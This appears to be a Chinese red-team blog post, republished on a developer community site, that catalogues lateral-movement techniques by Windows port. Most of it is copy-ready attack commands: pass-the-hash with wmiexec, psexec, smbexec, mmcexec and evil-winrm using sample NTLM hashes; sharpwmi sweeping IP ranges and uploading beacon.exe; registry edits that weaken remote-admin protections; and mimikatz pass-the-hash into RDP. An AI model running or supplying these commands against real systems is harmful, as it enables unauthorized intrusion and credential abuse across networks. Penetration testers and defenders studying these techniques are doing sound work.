前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
MCP广场
社区首页 >专栏 >红队技术-各端口横向移动方法

红队技术-各端口横向移动方法

作者头像
hyyrent
发布2022-12-26 20:01:54
发布2022-12-26 20:01:54
82000
代码可运行
举报
文章被收录于专栏:安全学习记录安全学习记录
运行总次数:0
代码可运行

135端口

wmiexec

代码语言:javascript
代码运行次数:0
运行
复制
python wmiexec.py -hashes :2687cb433215956d4ededb0d00334118 Tom@192.168.0.220
wmiexec.exe -hashes :2687cb433215956d4ededb0d00334118 Tom@192.168.0.220

这里过不去的需要在目标机器上开启注册表

代码语言:javascript
代码运行次数:0
运行
复制
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f

WMIHACKER

https://github.com/rootclay/WMIHACKER

代码语言:javascript
代码运行次数:0
运行
复制
cscript WMIHACKER_0.6.vbs /cmd 10.10.10.10 administrator "123456" "ipconfig" 1

sharpwmi

个人常用的一款,可以上传文件,但是文件大小限制512kb内

https://github.com/QAX-A-Team/sharpwmi

https://github.com/idiotc4t/sharpwmi

代码语言:javascript
代码运行次数:0
运行
复制
sharpwmi.exe login 192.168.2.3 administrator 123 cmd whoami
sharpwmi.exe login 192.168.2.3/24 administrator 123 cmd whoami
sharpwmi.exe login 192.168.2.3-23 administrator 123 upload beacon.exe c:\beacon.exe
sharpwmi.exe pth 192.168.2.3-192.168.2.77 cmd whoami
sharpwmi.exe pth 192.168.2.3/255.255.255.0 upload beacon.exe c:\beacon.exe

445端口

smbexec

代码语言:javascript
代码运行次数:0
运行
复制
smbexec.exe administrator:"mima"@10.61.9.46

psexec

这里使用的impacket工具包里的,微软自带的psexec不能使用hash进行传递

代码语言:javascript
代码运行次数:0
运行
复制
net use \\10.61.9.45\ipc$ "Yy@2019&03Gf" /user:administrator
psexec.exe \\10.61.9.45 -u administrator -p "mima" whoami
代码语言:javascript
代码运行次数:0
运行
复制
python psexec.py -hashes :ccef208c6485269c20db2cad21734fe7 administrator@192.168.0.100
psexec.exe -hashes :ccef208c6485269c20db2cad21734fe7 administrator@192.168.0.100

mmcexec

代码语言:javascript
代码运行次数:0
运行
复制
mmcexec.exe -hashes :ccef208c6485269c20db2cad21734fe7 administrator@192.168.0.100

3389端口

修改注册表

代码语言:javascript
代码运行次数:0
运行
复制
REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f

mimikatz进行hash传递,之后会弹出一个框,填入相应的IP即可

代码语言:javascript
代码运行次数:0
运行
复制
privilege::debug
sekurlsa::pth /user:dyy /domain:. /ntlm::2687cb433215956d4ededb0d00334118 "/run:mstsc.exe /restrictedadmin"

5985端口

evil-winrm

这里先安装ruby环境,https://rubyinstaller.org

代码语言:javascript
代码运行次数:0
运行
复制
gem install evil-winrm
代码语言:javascript
代码运行次数:0
运行
复制
evil-winrm -i 192.168.0.100 -u administrator -H ccef208c6485269c20db2cad21734fe7

报错异常情况

代码语言:javascript
代码运行次数:0
运行
复制
错误号5,拒绝访问:很可能你使⽤的⽤户不是管理员权限的(#先提升权限)
错误号51,Windows⽆法找到⽹络路径(#⽹络有问题)
错误号53,找不到⽹络路径:ip地址错误;⽬标末开机(#⽬标lanmanserver服务未启动;⽬标有
防⽕墙(端⼝过滤)
错误号67,找不到⽹络名(#你的lanmanworkstation服务末启动;⽬标删除了ipc$)
错误号1219,提供的凭据与⼰存在的凭据集冲突(#你已经和对⽅建⽴了⼀个ipc$,请删除在连)
错误号1326,未知的⽤户名或错误密码(#原因很明显)
错误号1792,试图登录,但是⽹络登录服务没有启动(#⽬标NetLogon服务末启动。(连接域控
会出现此情况)
错误号2242,此⽤户的密码⼰经过期(#⽬标有帐号策略,强制定期要求更改密码)
本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2022-06-10,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 135端口
    • wmiexec
    • WMIHACKER
    • sharpwmi
  • 445端口
    • psexec
    • mmcexec
  • 3389端口
  • 5985端口
    • evil-winrm
  • 报错异常情况
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档